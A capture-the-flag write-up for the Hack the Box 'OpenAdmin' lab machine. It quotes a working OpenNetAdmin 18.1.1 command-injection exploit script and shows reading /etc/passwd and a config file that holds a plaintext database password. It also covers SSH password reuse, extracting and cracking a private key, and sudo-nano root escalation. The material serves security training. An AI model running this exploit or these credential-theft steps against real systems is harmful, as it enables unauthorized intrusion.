Hack the Box OpenAdmin Writeup – 10.10.10.171

Hello, welcome to our Hack the Box write up series. Today we are doing OpenAdmin (10.10.10.171), is an easy Linux box.

HackTheBox’s first machine of 2020 seems to be a new year’s gift from HTB to gain some points and ranks all their users. This machine is very simple and straight-forward.

Let us start.

NMAP Port Scan

As usual, let us add the machine’s IP to etc/hosts as openadmin.htb for easier access. The next step is to run start the namp scan.

# root @ ns09 in ~/htb/openadmin [21:53:45] 
$ cat OpenAdmin_all_ports.nmap
# Nmap 7.80 scan initiated Sun Jan  5 23:03:08 2020 as: nmap -sC -sV -T5 -p- -oA OpenAdmin_all_ports openadmin.htb
Warning: 10.10.10.171 giving up on port because retransmission cap hit (2).
Nmap scan report for openadmin.htb (10.10.10.171)
Host is up (0.15s latency).
Not shown: 65503 closed ports, 30 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_  256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jan  5 23:16:37 2020 -- 1 IP address (1 host up) scanned in 808.45 seconds
# root @ ns09 in ~/htb/openadmin [21:53:57] 

The namp scan result shows, SSH on port 22, TCP port 80 which normally runs an HTTP service are open. A quick visit to port 80 shows the Apache2 website’s default welcome page.

The box is not disclosed anything interesting so far apart from a webpage and SSH. We might need to find directories for better enumeration. To see directories we need to run Dirbiuster, Let us set Dirbuster’s medium wordlist and start the scan.

let the Dirbuster run in the background and let us start enumerating the subdirectories it showed in the initial results. I started to concentrate on two directories, ONA and Music. I opened the http://openadmin.htb/ona which took me a webpage. This is the OpenNetAdmin control panel. The OpenNetAdmin is an opensource IP Address Management (IPAM) system.

A warning on the homepage shows the version of the app is 18.1.1. A quick look at vulnerabilities of version 18.1.1 on Google, shows the current version is vulnerable to RCE (remote code execution). So, at this point, we understood that this box is a victim of recently discovered exploit.

The ExploitDB listed two exploits, a Metasploit module, and a bash script.

• https://www.exploit-db.com/exploits/47772
• https://www.exploit-db.com/exploits/47691

# Exploit Title: OpenNetAdmin 18.1.1 - Remote Code Execution
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux

# Exploit Title: OpenNetAdmin v18.1.1 RCE
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux

#!/bin/bash

URL="${1}"
while true;do
 echo -n "$ "; read cmd
 curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done
            

I just download the script to my OpenAdmin working directory and run the script. The script gave me a shell as www-data immediately.

Since the user www-data is a low privileged user, we will not be able to perform any major tasks. So, we need to escalate his privilege to the next big user.

First, we need to find the users in the box. let us use cat /etc/passwd to see if we can perform the cat command to list the users.

$ ls -l /etc/passwd
-rw-r--r-- 1 root root 1660 Nov 22 18:01 /etc/passwd
$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
jimmy:x:1000:1000:jimmy:/home/jimmy:/bin/bash
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
joanna:x:1001:1001:,,,:/home/joanna:/bin/bash
$ 

So we found a number of users in this box, but I’m not sure which one I should start to above to get the privilege. let us start to enumerate the box searching for hints.

After a while, I found a PHP file called “database_settings.inc.php” inside the directory; /opt/ona/www/local/config/. The file has MySQL database credentials.

So far, we are not sure about which user we could use these credentials, so I listed the current local users of the box and I found jimmy and joanna.

$ cat /opt/ona/www/local/config/database_settings.inc.php
<?php
$ona_contexts=array (
  'DEFAULT' => 
  array (
    'databases' => 
    array (
      0 => 
      array (
        'db_type' => 'mysqli',
        'db_host' => 'localhost',
        'db_login' => 'ona_sys',
        'db_passwd' => 'n1nj4W4rri0R!',
        'db_database' => 'ona_default',
        'db_debug' => false,
      ),
    ),
    'description' => 'Default data context',
    'context_color' => '#D3DBFF',
  ),
);
$ 

Privilege Escalation

As the SSH was running, I tried ssh the box as jimmy, luckily it worked.

# root @ ns09 in ~/htb/openadmin [20:32:08] 
$ ssh jimmy@openadmin.htb
jimmy@openadmin.htb's password: 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
  System information as of Wed Jan  8 17:33:45 UTC 2020
  System load:  0.38              Processes:             200
  Usage of /:   49.1% of 7.81GB   Users logged in:       2
  Memory usage: 34%               IP address for ens160: 10.10.10.171
  Swap usage:   0%
  => There is 1 zombie process.
 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch
41 packages can be updated.
12 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Wed Jan  8 17:30:22 2020 from 10.10.15.63
jimmy@openadmin:~$ ls
jimmy@openadmin:~$ cd home
-bash: cd: home: No such file or directory
jimmy@openadmin:~$ ls -la
total 32
drwxr-x--- 5 jimmy jimmy 4096 Nov 22 23:15 .
drwxr-xr-x 4 root  root  4096 Nov 22 18:00 ..
lrwxrwxrwx 1 jimmy jimmy    9 Nov 21 14:07 .bash_history -> /dev/null
-rw-r--r-- 1 jimmy jimmy  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 jimmy jimmy 3771 Apr  4  2018 .bashrc
drwx------ 2 jimmy jimmy 4096 Nov 21 13:52 .cache
drwx------ 3 jimmy jimmy 4096 Nov 21 13:52 .gnupg
drwxrwxr-x 3 jimmy jimmy 4096 Nov 22 23:15 .local
-rw-r--r-- 1 jimmy jimmy  807 Apr  4  2018 .profile
jimmy@openadmin:~$ 

However, after a while, It has been realized this user doesn’t have a User flag, so let us proceed to enumerate more. The user’s www folder has a special folder called “internal” which contained,

jimmy@openadmin:~$ ls
jimmy@openadmin:~$ ls -la
total 32
drwxr-x--- 5 jimmy jimmy 4096 Nov 22 23:15 .
drwxr-xr-x 4 root  root  4096 Nov 22 18:00 ..
lrwxrwxrwx 1 jimmy jimmy    9 Nov 21 14:07 .bash_history -> /dev/null
-rw-r--r-- 1 jimmy jimmy  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 jimmy jimmy 3771 Apr  4  2018 .bashrc
drwx------ 2 jimmy jimmy 4096 Nov 21 13:52 .cache
drwx------ 3 jimmy jimmy 4096 Nov 21 13:52 .gnupg
drwxrwxr-x 3 jimmy jimmy 4096 Nov 22 23:15 .local
-rw-r--r-- 1 jimmy jimmy  807 Apr  4  2018 .profile
jimmy@openadmin:~$ cd /
jimmy@openadmin:/$ ls
bin   cdrom  etc   initrd.img      lib    lost+found  mnt  proc  run   snap  swap.img  tmp  var      vmlinuz.old
boot  dev    home  initrd.img.old  lib64  media       opt  root  sbin  srv   sys       usr  vmlinuz
jimmy@openadmin:/$ cd var
jimmy@openadmin:/var$ ls
backups  cache  crash  lib  local  lock  log  mail  opt  run  snap  spool  tmp  www
jimmy@openadmin:/var$ cd www
jimmy@openadmin:/var/www$ ls
html  internal  ona
jimmy@openadmin:/var/www$ cd internal
jimmy@openadmin:/var/www/internal$ ls
index.php  logout.php  main.php
jimmy@openadmin:/var/www/internal$ cat main.php
<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); }; 
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>
<html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>
jimmy@openadmin:/var/www/internal$ 

The file “main.php” is our key to get the private key from user Joanna and login as Joanna. To get the private key, we need to run a cURL command. Upon proceeding to run cURL as local, We are blocked by an error “404 Not Found” with 127.0.0.1 running in the port 80. This made me realized that I need to find the port number which will give me access to the private key.

jimmy@openadmin:~$ curl http://127.0.0.1/main.php
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at 127.0.0.1 Port 80</address>
</body></html>
jimmy@openadmin:~$ 

To find open ports within the system, I run “netstat -tulpn” command. The netstat listed a few open and listening ports:

jimmy@openadmin:/var/www/internal$ netstat -tulpn
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:52846         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
udp        0      0 127.0.0.53:53           0.0.0.0:*                           -                   

I proceed with one by one, the second port 52846 returned the private key of user Joanna.

jimmy@openadmin:/var/www/internal$ curl http://127.0.0.1:3306/main.php
Warning: Binary output can mess up your terminal. Use "--output -" to tell 
Warning: curl to output it to your terminal anyway, or consider "--output 
Warning: <FILE>" to save to a file.
jimmy@openadmin:/var/www/internal$ curl http://127.0.0.1:52846/main.php
<pre>-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D

kG0UYIcGyaxupjQqaS2e1HqbhwRLlNctW2HfJeaKUjWZH4usiD9AtTnIKVUOpZN8
ad/StMWJ+MkQ5MnAMJglQeUbRxcBP6++Hh251jMcg8ygYcx1UMD03ZjaRuwcf0YO
ShNbbx8Euvr2agjbF+ytimDyWhoJXU+UpTD58L+SIsZzal9U8f+Txhgq9K2KQHBE
6xaubNKhDJKs/6YJVEHtYyFbYSbtYt4lsoAyM8w+pTPVa3LRWnGykVR5g79b7lsJ
ZnEPK07fJk8JCdb0wPnLNy9LsyNxXRfV3tX4MRcjOXYZnG2Gv8KEIeIXzNiD5/Du
y8byJ/3I3/EsqHphIHgD3UfvHy9naXc/nLUup7s0+WAZ4AUx/MJnJV2nN8o69JyI
9z7V9E4q/aKCh/xpJmYLj7AmdVd4DlO0ByVdy0SJkRXFaAiSVNQJY8hRHzSS7+k4
piC96HnJU+Z8+1XbvzR93Wd3klRMO7EesIQ5KKNNU8PpT+0lv/dEVEppvIDE/8h/
/U1cPvX9Aci0EUys3naB6pVW8i/IY9B6Dx6W4JnnSUFsyhR63WNusk9QgvkiTikH
40ZNca5xHPij8hvUR2v5jGM/8bvr/7QtJFRCmMkYp7FMUB0sQ1NLhCjTTVAFN/AZ
fnWkJ5u+To0qzuPBWGpZsoZx5AbA4Xi00pqqekeLAli95mKKPecjUgpm+wsx8epb
9FtpP4aNR8LYlpKSDiiYzNiXEMQiJ9MSk9na10B5FFPsjr+yYEfMylPgogDpES80
X1VZ+N7S8ZP+7djB22vQ+/pUQap3PdXEpg3v6S4bfXkYKvFkcocqs8IivdK1+UFg
S33lgrCM4/ZjXYP2bpuE5v6dPq+hZvnmKkzcmT1C7YwK1XEyBan8flvIey/ur/4F
FnonsEl16TZvolSt9RH/19B7wfUHXXCyp9sG8iJGklZvteiJDG45A4eHhz8hxSzh
Th5w5guPynFv610HJ6wcNVz2MyJsmTyi8WuVxZs8wxrH9kEzXYD/GtPmcviGCexa
RTKYbgVn4WkJQYncyC0R1Gv3O8bEigX4SYKqIitMDnixjM6xU0URbnT1+8VdQH7Z
uhJVn1fzdRKZhWWlT+d+oqIiSrvd6nWhttoJrjrAQ7YWGAm2MBdGA/MxlYJ9FNDr
1kxuSODQNGtGnWZPieLvDkwotqZKzdOg7fimGRWiRv6yXo5ps3EJFuSU1fSCv2q2
XGdfc8ObLC7s3KZwkYjG82tjMZU+P5PifJh6N0PqpxUCxDqAfY+RzcTcM/SLhS79
yPzCZH8uWIrjaNaZmDSPC/z+bWWJKuu4Y1GCXCqkWvwuaGmYeEnXDOxGupUchkrM
+4R21WQ+eSaULd2PDzLClmYrplnpmbD7C7/ee6KDTl7JMdV25DM9a16JYOneRtMt
qlNgzj0Na4ZNMyRAHEl1SF8a72umGO2xLWebDoYf5VSSSZYtCNJdwt3lF7I8+adt
z0glMMmjR2L5c2HdlTUt5MgiY8+qkHlsL6M91c4diJoEXVh+8YpblAoogOHHBlQe
K1I1cqiDbVE/bmiERK+G4rqa0t7VQN6t2VWetWrGb+Ahw/iMKhpITWLWApA3k9EN
-----END RSA PRIVATE KEY-----
</pre><html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>
jimmy@openadmin:/var/www/internal$ 

The SSH key has a password phrase for login, I copied the key to my Kali machine and used John to crack the password using rockyou.txt. John cracked the password as “bloodninjas“. I immediately SSH the box- as Joanna and got the user.txt.

joanna@openadmin:~$ ls
user.txt
joanna@openadmin:~$ cat user.txt
c9b2c[---------]c81b5f
joanna@openadmin:~$ 

Getting Into the Root

There are two ways you can get the root access on this machine using the privileges of our user Joanna. The first one is very simple by opening the nano as root and reding the root.txt file. The second one is getting the shell as root by adding yourself as the root user by editing the etc/passwd file, and then switch the user as your own user name.

Procedure 1: getting the root flag from nano:

The sudo -l command revealed that the user Joanna is able to run bin/nano /opt/priv as root without password. When you see the user can run nano as root, it is the simplest thing to exploit. Just 3 commands and the box is yours.

Run:

joanna@openadmin:~$ sudo /bin/nano /opt/priv

Does the Sudo confirm if you really need to run the file as root? obviously say “yes”.

Now, that you have nano running as root. Press CTR+ R (Read File) root/root.txt

And CTR+O (Write file) to read the root.txt.

Procedure 2: Adding yourself as a root user

Press CTRL+O to read the file etc/passwd

Now the nano displays the contents of etc/passwd file, create a user in your name and assign a password and save using CTRL+O (Write file). Then exit the nano, go back to the terminal.

That’s it. Thank you for reading.